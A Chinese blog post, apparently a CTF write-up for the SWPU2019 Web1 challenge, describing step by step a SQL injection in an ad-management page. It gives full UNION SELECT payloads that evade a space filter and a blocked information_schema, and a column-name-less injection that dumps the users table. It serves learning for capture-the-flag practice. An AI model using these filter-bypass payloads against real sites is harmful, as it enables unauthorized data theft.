news 2026/4/23 15:08:26

[SWPU2019]Web1 1

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[SWPU2019]Web1 1

一个登录界面 这里测试了一下并没有发现sql注入点

注册了一个账号

最终在广告信息管理中发现sql注入点

开始注入

经过一些简单的测试可知空格 or 等被过滤了,所以这里用group来测列数

这里的闭合方式用 引号' 不然会报错

可以看到列23报错

现在查回显位

-1'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'3

回显位2,3

曝库

-1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'3

得到web1库

然后就是报表

但是这里information_schema.tables被过滤,这里有两种绕过姿势

mysql.innodb_table_stats sys.schema_auto_increment_columns
1'/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"'

接着曝列

但是总是被ban

看了其他师傅的wp知道 要用无列名注入

pyload

-1'/**/union/**/select/**/1,(select/**/group_concat(`2`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1

把2改成3即可得到flag

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/23 8:19:02

入门篇--2-Windows上如何用Conda松管理多个Python版本?

大家好,我是你们的老朋友Weisian,一个常年在Windows上写代码、调环境、修Bug的开发者。今天想和大家聊一个几乎所有Python 开发者都会遇到的“日常烦恼”:如何在Windows上干净、高效地管理多个Python版本? 你是不是也经历过这些场…

作者头像 李华
网站建设 2026/4/23 11:21:27

中山网络推广公司:进阶方向与经验总结

随着中山网络推广公司的不断发展,网络营销技术和数字化传播在提升区域品牌竞争力方面的作用愈加显著。近年来,中山的网络推广成效逐渐显现,但要在快速发展的数字化环境中持续优化,还面临着诸多挑战。本文将对中山网络推广的阶段性…

作者头像 李华
网站建设 2026/4/23 11:19:04

基于VUE的企业信息管理系统 [VUE]-计算机毕业设计源码+LW文档

摘要:随着企业数字化转型的加速,高效、集成的企业信息管理系统成为提升企业竞争力的关键。本文详细阐述了基于VUE框架开发的企业信息管理系统,涵盖系统需求分析、技术选型、架构设计、功能模块实现等内容。该系统整合了系统用户管理、新闻数据…

作者头像 李华
网站建设 2026/4/23 11:20:09

list 的cpp简单模拟实现

节点类模板 template<class T> struct list_node {T _data; // 节点存储的数据list_node<T>* _next; // 指向下一个节点的指针list_node<T>* _prev; // 指向前一个节点的指针list_node(const T& data T()):_data(data),_next(null…

作者头像 李华
网站建设 2026/4/23 9:56:51

Modbus TCP关键知识点回顾

目录 1️⃣ 本质定位&#xff08;最关键&#xff09; 2️⃣ 数据模型&#xff08;必须会&#xff09; 3️⃣ 报文结构&#xff08;非常关键&#xff09; 4️⃣ 常用功能码&#xff08;重点记&#xff09; 5️⃣ 地址理解&#xff08;易踩坑&#xff09; 6️⃣ TCP 特性&a…

作者头像 李华
网站建设 2026/4/23 11:19:49

MR-J3-100BS4伺服驱动器

SGMG-09A6W-YG1 伺服电机 — 产品特点高精度控制&#xff1a;内置高分辨率编码器&#xff0c;可实现精确的位置、速度和方向控制&#xff0c;确保运动控制的稳定性和重复性。快速动态响应&#xff1a;具备出色的加速、减速和频繁启动能力&#xff0c;适合高动态运动和快速定位场…

作者头像 李华